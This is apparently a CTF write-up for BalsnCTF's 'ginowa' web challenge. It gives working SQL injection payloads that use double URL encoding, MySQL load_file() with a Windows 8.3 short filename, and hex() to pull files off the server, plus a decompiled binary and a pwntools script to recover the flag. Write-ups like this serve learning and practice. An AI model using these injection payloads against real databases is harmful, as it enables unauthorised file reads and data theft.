# *SOME WEB THINGs THAT I LEARNED (part 2)*

# *SOME WEB THINGs THAT I LEARNED (part 2)* #### Recently i got some new things that i learned from some challs that i want to share. ###### This is from BalsnCTF chall that i rencently played. ## ginowa - The challenge give us a website where its like Tinder? i guess idk xD. You can like, dislike just like Tinder, but for chihuahua. - Visiting the site we can see that when we got changed to another chihuahua, the id param on the URL change. Looks like it is fetching the content base on what is being passed in on the url, potentially SQLi. ![](https://hackmd.io/_uploads/Hk2YSOZbp.png) - Lets take a look at the source. There are lots of file to read from but only i think ... 2 of them is important to the exploit. We will look over all of them but mostly the 2 files. ### 2. The source code #### Backend: - **api.php**: This file if one of the 2 files. It is the one that is doing the SQL. First it set the param id, by default is 1. It then connect to MySQL, which will then execute the following command:![](https://hackmd.io/_uploads/SJ1WPuWZ6.png) Now, this command is not going through any sanitization, or using ```prepared statement```, which, make it vulnerable to ```SQLi``` (like we said before). It then basically fetch the content base on the id being passed in. - **config.php**: This file contains code that define values for MySQL, like database name, host, user,... so we can use it to connect to MySQL. - **info.php***: runs phpinfo(), gives us the info about the php that we are using, like version, environment, server information,... - **list.php**: running this command, it will retrieve and display information about all services on the Windows system, including details like their status, display name, and other properties. #### Frontend: - **config.php**: contains a fucntion which randomize the next id we get if we "swipe" (like Tinder). - **info.php**: the code in this file look for wheter in the url got the param ```?action```, it will then execute base on the value of the param: - ?action=frontend: returns phpinfo() - ?action=backend: runs the info.php file in the backend, which the same, would return phpinfo() - ?action=backend2: runs the list.php, which would return the services running on Window. - **index.php**: the code check for our id param in the url, if it doesn't exist, by default id = 1. Then it checks for the status, which will be fetch from the database through our SQL, if its equals to ```ok```, then OK xD. If not, then returns ```DB error```. Now the thing is it is running ```file_get_contents```, which returns us the content of a file base on our path that we provide. It is reading the file through the url that we enter.![](https://hackmd.io/_uploads/SJKYjO-Za.png) Now we won't be able to send a normal SQLi payload and expect it to works. What we need is a bit of trick. ### 3. Exploit - First SQL injection. Simple: 4 colummns, 4 values to pass in. Simple right? We can just inject something like:```-1' union select 'ok', 'a',1,'a```. The ok is the status, a is string and 1 is int. Simple xD. - Now the thing is ```file_get_content``` wont see it that way (not like our website). We can try to send the payload and observe what it returns.![](https://hackmd.io/_uploads/rJwtbYbZa.png) - The url is url decode and pass into ```file_get_contents```, which when the function look at the url, would be an invalid format of a url that it try to access. We need to somehow provide it with a valid url so that it can read the url so that our SQL will be injected. Thats when ```double URL encoding``` comes in. Giving it a double encoded URL, it will first be decode once, then pass into the function, which now would be valid. Let's test it out. ![](https://hackmd.io/_uploads/SJKPHYW-a.png) - Success! Now the challenge tell us to call to the ```readflag-[some hex].exe``` file to get the flag. This is imposible since SQL doesn't have any command that we can use to execute an executable file. But maybe we can do it locally? - After some bit of search for *```how to read file in MySQL```*, i found that MySQL has a command **```load_file```**, which would return a content of a file in a string format. Nice! we can use it to grab the exe file and run it locally. But ... what about the filename, we dont know the hex value. - Googling the entire morning returns me nothing, can't find any ways to get a hidden file name from a directory. Returns to the source code and challenge, i see that the file is in ```C:/``` and the web is running ```sc queryex```. Searching about it gives me some information that te chall is running on window.![](https://hackmd.io/_uploads/H1QzDtbW6.png) - So ... is there vulnerability about file, especially filename on Window? Yes! There is this one that stand out:![](https://hackmd.io/_uploads/BJODDtWZT.png) You can read about it here for better explanation:```https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/``` - Reading about it, the short filename has the limit of 6 characters, so we can abuse that by reading the ```readfl~1.exe``` file. Payload:```-1' union select 'ok', (load_file('C:/readfl~1.exe')),1,'a```. But sending it give me this:![](https://hackmd.io/_uploads/r1wwhtbZ6.png) - Of course, cause it's a exe file, we need to compile it in order to read it. So what now? Looking around again, i found SQl has something called ```hex()```, which would return hex of any input that it is given. Using that i was able to get the full hex:![](https://hackmd.io/_uploads/H1tHTFbbT.png) - Nice! Now go onto Cyberchef and decode from hex, then download the exe file. From here basically idk what to do since it involves with exe => Rev to be clear. So i ask my friend ***```n1w```*** to help me reverse this. ```c int __cdecl main(int argc, const char **argv, const char **envp) { char Str[28]; // [rsp+20h] [rbp-60h] BYREF int v5; // [rsp+3Ch] [rbp-44h] __int64 v6; // [rsp+40h] [rbp-40h] __int64 v7; // [rsp+48h] [rbp-38h] __int64 v8; // [rsp+50h] [rbp-30h] __int64 v9; // [rsp+58h] [rbp-28h] __int64 v10; // [rsp+60h] [rbp-20h] __int64 v11; // [rsp+68h] [rbp-18h] __int64 v12; // [rsp+70h] [rbp-10h] __int64 v13; // [rsp+78h] [rbp-8h] int v14; // [rsp+80h] [rbp+0h] char Buffer[104]; // [rsp+90h] [rbp+10h] BYREF FILE *Stream; // [rsp+F8h] [rbp+78h] _main(); strcpy(Str, "agyrutgreugweoffeihrefkeowf"); v5 = 0; v6 = 0i64; v7 = 0i64; v8 = 0i64; v9 = 0i64; v10 = 0i64; v11 = 0i64; v12 = 0i64; v13 = 0i64; v14 = 0; Stream = fopen("s", "r"); if ( Stream ) { if ( fgets(Buffer, 100, Stream) ) { Buffer[strcspn(Buffer, "\n")] = 0; Str[strcspn(Str, "\n")] = 0; decrypt(Buffer, Str); text_49("%s", Buffer); return 0; } else { perror("Error reading input"); fclose(Stream); return 1; } } else { perror("Error opening files"); return 1; } } ``` - So basically the exe file takes in data from a file called ```s```?. It then take the content of the s file, use ```agyrutgreugweoffeihrefkeowf``` as key to decrypt it and return us the flag. So ... SQli to get thhe s file. The file should be in the same folder.![](https://hackmd.io/_uploads/HyudyqWba.png) - Now take the exe file and s file, put it in 1 folder and run the exe file. Or my friend decide to just code it out. ```py from pwn import process hex_string = "232635213B0F0D27500138433A5A0B520905371F3C5352293003345024120F" char_array = bytes.fromhex(hex_string) with open('s', 'wb') as f: f.write(char_array) io=process('./test1.exe') print(io.recv()) ``` **Flag: BALSN{jU5t_4_5m4ll_mY59L_tR1Ck}** ### What i learn: - Window has a filename vulnerability( i just know about it today xD). - New command in SQL that we can use to read file: load_file() and hex(). ## Thank you for reading >.< Gud bye ![](https://hackmd.io/_uploads/rJjmZ9--6.jpg)